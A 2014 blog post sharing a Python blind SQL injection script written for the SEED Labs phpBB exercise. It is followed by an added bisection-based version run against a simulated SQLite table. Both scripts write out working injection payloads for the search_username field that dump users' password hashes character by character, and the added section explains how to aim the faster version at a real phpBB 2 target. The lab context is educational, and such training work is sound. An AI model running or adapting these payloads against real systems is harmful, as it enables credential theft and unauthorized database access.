Sunday, April 20, 2014

SQL Injection Script written for SEED Labs

SEED Labs are located here: http://www.cis.syr.edu/~wedu/seed/
These are great labs to learn more about cyber security and penetration testing.

The script below was developed to demonstrate SQL injection against the phpBB lab that they provide.  Though the lab itself does not require this, it was a great script to write.  With the script I extract the password hashes for the 5 users found on the system.  The search_username field of the user search is pasted straight into the query's LIKE '...' string, so a value of 4' OR user_password LIKE 'prefix% (the page's own closing quote finishes the string) returns every user whose hash begins with prefix; the hash is recovered one character at a time by checking whether the target's username comes back in the results list.

This script could be made more efficient by replacing the per-character brute force (up to 36 requests per position) with conditional statements that compare the unknown character against a midpoint of the alphabet, so each position is narrowed down in a handful of requests instead of tried letter by letter.

#!/usr/bin/env python
# Python 2 (the SEED Ubuntu 9 image ships Python 2).  Blind SQL injection against
# the phpBB user search (search.php?mode=searchuser) in the SEED SQL injection lab.

import socket

BUFSIZE = 1024

# Change hostInput to the IP address of your SEED installation of Ubuntu 9.
hostInput = '172.16.108.140'
hostName = 'www.sqllabmysqlphpbb.com'

userNames = ['admin', 'alice', 'bob', 'carol', 'ted']
#userNames = ['ted']

# phpBB 2 stores MD5 hashes, so lowercase hex would be enough; the wider set only
# costs extra requests.
alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789'
# Upper bound on the hash length; the loop stops earlier as soon as no character matches.
maxLength = 40


def searchUsers(body):
    """POST the form body to search.php?mode=searchuser and return the full raw response."""
    tcpServerSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tcpServerSocket.connect((hostInput, 80))

    searchRequest = (
        "POST http://" + hostName + "/search.php?mode=searchuser HTTP/1.1\r\n"
        "Host: " + hostName + "\r\n"
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1\r\n"
        "Accept-Language: en-US,en;q=0.5\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        # Connection: close makes the server end the response, so we can read until EOF
        # instead of guessing how many recv() calls the page takes.
        "Connection: close\r\n"
        # Content-Length is computed from the body rather than hard-coded.
        "Content-Length: " + str(len(body)) + "\r\n"
        "\r\n" + body
    )
    #print searchRequest

    tcpServerSocket.sendall(searchRequest)
    pageReturned = ''
    while True:
        chunk = tcpServerSocket.recv(BUFSIZE)
        if not chunk:
            break
        pageReturned += chunk
    tcpServerSocket.close()
    return pageReturned


for userName in userNames:
    userPassword = ''
    for number in range(1, maxLength + 1):
        matched = False
        for letter in alphabet:
            # The search_username value lands inside the query's LIKE '...' string, so
            # 4' OR user_password LIKE 'prefixX%  (closing quote supplied by the page)
            # returns every user whose hash starts with prefixX.  %27 is ' and %25 is %.
            body = ("search_username=4%27+OR+user_password+LIKE+%27"
                    + userPassword + letter + "%25&search=Search")
            pageReturned = searchUsers(body)

            # The results page lists matching users as <option> elements; if ours is
            # there, the guessed character is correct and we move to the next position.
            if '<option value="' + userName + '">' in pageReturned:
                userPassword = userPassword + letter
                matched = True
                break
        if not matched:
            # No character matched at this position: the whole hash has been recovered.
            break

    print "The hash stored as the password for " + userName + " is " + userPassword
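The conditional approach mentioned above, worked through as an added example (not part of the original post or of the SEED lab materials): instead of trying each of the 36 characters in turn, ask the server whether the next character of the hash sorts after a midpoint of the alphabet and halve the range each time, so a position costs at most 7 requests (6 comparisons plus one confirmation) rather than 36. The network and phpBB are replaced by an in-memory SQLite table and a search function that pastes the search_username value into a LIKE '...' clause the way the lab's page does; the table name and columns, the exact query shape, and the five sample passwords are assumptions made for this demo, and the hashes it recovers are whatever MD5 values the constructed table holds.

```python
import hashlib
import sqlite3

# Alphabet from the post, sorted by code point so that string comparison in SQL
# agrees with the order we bisect over.
ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyz"

# Constructed stand-in for the lab's phpbb_users table: the usernames from the post
# with made-up plaintext passwords, hashed with MD5 as phpBB 2 does.
SAMPLE_USERS = {"admin": "letmein", "alice": "wonderland", "bob": "builder",
                "carol": "singer", "ted": "talks"}
SAMPLE_HASHES = dict((u, hashlib.md5(p.encode("ascii")).hexdigest())
                     for u, p in SAMPLE_USERS.items())


def build_db():
    """In-memory table standing in for the lab database (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE phpbb_users (username TEXT, user_password TEXT)")
    conn.executemany("INSERT INTO phpbb_users VALUES (?, ?)", list(SAMPLE_HASHES.items()))
    return conn


def search_users(conn, search_username):
    """Simulated vulnerable user search: the form value is concatenated into the query
    (assumed query shape, not copied from phpBB), so the template's closing quote
    terminates whatever the attacker supplies.  Returns the usernames the results page
    would list as <option> elements."""
    sql = "SELECT username FROM phpbb_users WHERE username LIKE '" + search_username + "'"
    return [row[0] for row in conn.execute(sql)]


def ask(conn, user, pos, op, ch):
    """One blind yes/no question: does character `pos` of `user`'s hash satisfy `op ch`?
    The trailing 'x' = 'x is completed by the template's own closing quote."""
    payload = ("4' OR (username = '%s' AND substr(user_password, %d, 1) %s '%s') AND 'x' = 'x"
               % (user, pos, op, ch))
    return user in search_users(conn, payload)


def extract_hash(conn, user, max_len=64):
    """Recover the hash one character at a time: bisect ALPHABET with '>' questions,
    then confirm the candidate with '='.  Returns (hash, number_of_requests)."""
    found = ""
    queries = 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, len(ALPHABET) - 1
        while lo < hi:
            mid = (lo + hi) // 2
            queries += 1
            if ask(conn, user, pos, ">", ALPHABET[mid]):
                lo = mid + 1      # the character sorts after ALPHABET[mid]
            else:
                hi = mid          # the character is ALPHABET[mid] or earlier
        queries += 1
        if not ask(conn, user, pos, "=", ALPHABET[lo]):
            # Past the end of the hash: substr() returns '' which never equals a letter.
            break
        found += ALPHABET[lo]
    return found, queries


def extract_all(conn):
    """Dump every sample user's hash; values are (hash, requests) pairs."""
    return dict((user, extract_hash(conn, user)) for user in SAMPLE_USERS)


if __name__ == "__main__":
    conn = build_db()
    for user, (digest, requests) in sorted(extract_all(conn).items()):
        print("%s: %s (%d requests)" % (user, digest, requests))
```

Each 32-character MD5 takes 33 positions (the last one detects the end), so the whole hash costs at most 231 requests instead of the 1152 the letter-by-letter loop above issues; against a real phpBB 2 target the only change is that `ask` would send the payload in the search_username form field and look for the `<option value="user">` marker in the HTML, exactly as the script above does.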


